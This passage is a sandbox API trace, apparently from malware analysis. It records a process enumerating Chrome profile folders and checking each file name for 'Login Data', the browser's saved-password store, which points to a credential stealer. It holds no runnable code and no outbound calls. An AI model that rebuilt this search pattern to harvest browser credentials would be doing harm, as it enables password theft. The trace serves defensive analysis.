State\\") returned 92 [0161.466] lstrlenW (lpString="000003.log") returned 10 [0161.466] GetProcessHeap () returned 0x8e0000 [0161.466] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xce) returned 0x8fcdb8 [0161.466] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" [0161.466] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", lpString2="000003.log" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log" [0161.466] VirtualQuery (in: lpAddress=0x9256d8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.466] GetProcessHeap () returned 0x8e0000 [0161.466] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256d8 | out: hHeap=0x8e0000) returned 1 [0161.466] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log", lpSrch="Login Data") returned 0x0 [0161.466] VirtualQuery (in: lpAddress=0x8fcdb8, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1f000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.466] GetProcessHeap () returned 0x8e0000 [0161.466] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fcdb8 | out: hHeap=0x8e0000) returned 1 [0161.466] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824ad030, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x824d3190, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0x0, dwReserved1=0x0, cFileName="CURRENT", cAlternateFileName="")) returned 1 [0161.466] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 91 [0161.466] lstrlenW (lpString="\\") returned 1 [0161.466] GetProcessHeap () returned 0x8e0000 [0161.466] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xba) returned 0x9256d8 [0161.466] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State" [0161.466] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" [0161.466] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned 92 [0161.466] lstrlenW (lpString="CURRENT") returned 7 [0161.466] GetProcessHeap () returned 0x8e0000 [0161.466] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc8) returned 0x9257a0 [0161.466] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" [0161.466] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", lpString2="CURRENT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT" [0161.466] VirtualQuery (in: lpAddress=0x9256d8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.466] GetProcessHeap () returned 0x8e0000 [0161.466] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256d8 | out: hHeap=0x8e0000) returned 1 [0161.466] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT", lpSrch="Login Data") returned 0x0 [0161.466] VirtualQuery (in: lpAddress=0x9257a0, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.466] GetProcessHeap () returned 0x8e0000 [0161.466] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257a0 | out: hHeap=0x8e0000) returned 1 [0161.466] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824ad030, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x824ad030, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LOCK", cAlternateFileName="")) returned 1 [0161.467] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 91 [0161.467] lstrlenW (lpString="\\") returned 1 [0161.467] GetProcessHeap () returned 0x8e0000 [0161.467] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xba) returned 0x9256d8 [0161.467] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State" [0161.467] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" [0161.467] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned 92 [0161.467] lstrlenW (lpString="LOCK") returned 4 [0161.467] GetProcessHeap () returned 0x8e0000 [0161.467] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc2) returned 0x9257a0 [0161.467] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" [0161.467] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", lpString2="LOCK" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK" [0161.467] VirtualQuery (in: lpAddress=0x9256d8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.467] GetProcessHeap () returned 0x8e0000 [0161.467] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256d8 | out: hHeap=0x8e0000) returned 1 [0161.467] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK", lpSrch="Login Data") returned 0x0 [0161.467] VirtualQuery (in: lpAddress=0x9257a0, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.467] GetProcessHeap () returned 0x8e0000 [0161.467] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257a0 | out: hHeap=0x8e0000) returned 1 [0161.467] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824ad030, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8c6f3fb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x9a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LOG", cAlternateFileName="")) returned 1 [0161.467] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 91 [0161.467] lstrlenW (lpString="\\") returned 1 [0161.467] GetProcessHeap () returned 0x8e0000 [0161.467] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xba) returned 0x9256d8 [0161.467] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State" [0161.467] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" [0161.467] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned 92 [0161.467] lstrlenW (lpString="LOG") returned 3 [0161.467] GetProcessHeap () returned 0x8e0000 [0161.467] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc0) returned 0x9257a0 [0161.467] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" [0161.467] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", lpString2="LOG" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG" [0161.467] VirtualQuery (in: lpAddress=0x9256d8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.467] GetProcessHeap () returned 0x8e0000 [0161.468] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256d8 | out: hHeap=0x8e0000) returned 1 [0161.468] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG", lpSrch="Login Data") returned 0x0 [0161.468] VirtualQuery (in: lpAddress=0x9257a0, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.468] GetProcessHeap () returned 0x8e0000 [0161.468] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257a0 | out: hHeap=0x8e0000) returned 1 [0161.468] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824ad030, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x824ad030, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 1 [0161.468] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 91 [0161.468] lstrlenW (lpString="\\") returned 1 [0161.468] GetProcessHeap () returned 0x8e0000 [0161.468] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xba) returned 0x9256d8 [0161.468] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State" [0161.468] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" [0161.468] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned 92 [0161.468] lstrlenW (lpString="MANIFEST-000001") returned 15 [0161.468] GetProcessHeap () returned 0x8e0000 [0161.468] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd8) returned 0x9257a0 [0161.468] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\" [0161.468] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\", lpString2="MANIFEST-000001" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001" [0161.468] VirtualQuery (in: lpAddress=0x9256d8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.468] GetProcessHeap () returned 0x8e0000 [0161.468] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256d8 | out: hHeap=0x8e0000) returned 1 [0161.468] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001", lpSrch="Login Data") returned 0x0 [0161.468] VirtualQuery (in: lpAddress=0x9257a0, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.468] GetProcessHeap () returned 0x8e0000 [0161.468] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9257a0 | out: hHeap=0x8e0000) returned 1 [0161.468] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x824ad030, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x824ad030, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x824ad030, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x29, dwReserved0=0x0, dwReserved1=0x0, cFileName="MANIFEST-000001", cAlternateFileName="MANIFE~1")) returned 0 [0161.468] FindClose (in: hFindFile=0x8f9b00 | out: hFindFile=0x8f9b00) returned 1 [0161.469] VirtualQuery (in: lpAddress=0x925610, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.469] GetProcessHeap () returned 0x8e0000 [0161.469] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925610 | out: hHeap=0x8e0000) returned 1 [0161.469] VirtualQuery (in: lpAddress=0x925550, lpBuffer=0x2df314, dwLength=0x1c | out: lpBuffer=0x2df314*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.469] GetProcessHeap () returned 0x8e0000 [0161.469] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925550 | out: hHeap=0x8e0000) returned 1 [0161.469] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80d1a580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9174a630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9174a630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Extensions", cAlternateFileName="EXTENS~1")) returned 1 [0161.469] lstrcmpiW (lpString1="Extensions", lpString2=".") returned 1 [0161.469] lstrcmpiW (lpString1="Extensions", lpString2="..") returned 1 [0161.469] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0161.469] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0161.469] lstrlenW (lpString="\\") returned 1 [0161.469] GetProcessHeap () returned 0x8e0000 [0161.469] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0161.469] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0161.469] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0161.470] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0161.470] lstrlenW (lpString="Extensions") returned 10 [0161.470] GetProcessHeap () returned 0x8e0000 [0161.470] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xae) returned 0x925550 [0161.470] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0161.470] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Extensions" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions" [0161.470] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.470] GetProcessHeap () returned 0x8e0000 [0161.470] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0161.470] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 86 [0161.470] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 86 [0161.470] lstrlenW (lpString="\\*.*") returned 4 [0161.470] GetProcessHeap () returned 0x8e0000 [0161.470] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb6) returned 0x925608 [0161.470] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions" [0161.470] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\*.*" [0161.470] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\*.*", lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80d1a580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9174a630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9174a630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b00 [0161.496] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.496] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80d1a580, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9174a630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9174a630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.496] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.496] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.496] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85cca3f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cf0550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cf0550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="aapocclcgogkmnckokdopfmhonfmgoek", cAlternateFileName="AAPOCC~1")) returned 1 [0161.496] lstrcmpiW (lpString1="aapocclcgogkmnckokdopfmhonfmgoek", lpString2=".") returned 1 [0161.496] lstrcmpiW (lpString1="aapocclcgogkmnckokdopfmhonfmgoek", lpString2="..") returned 1 [0161.496] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 86 [0161.496] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions") returned 86 [0161.496] lstrlenW (lpString="\\") returned 1 [0161.496] GetProcessHeap () returned 0x8e0000 [0161.496] RtlAllocateHeap 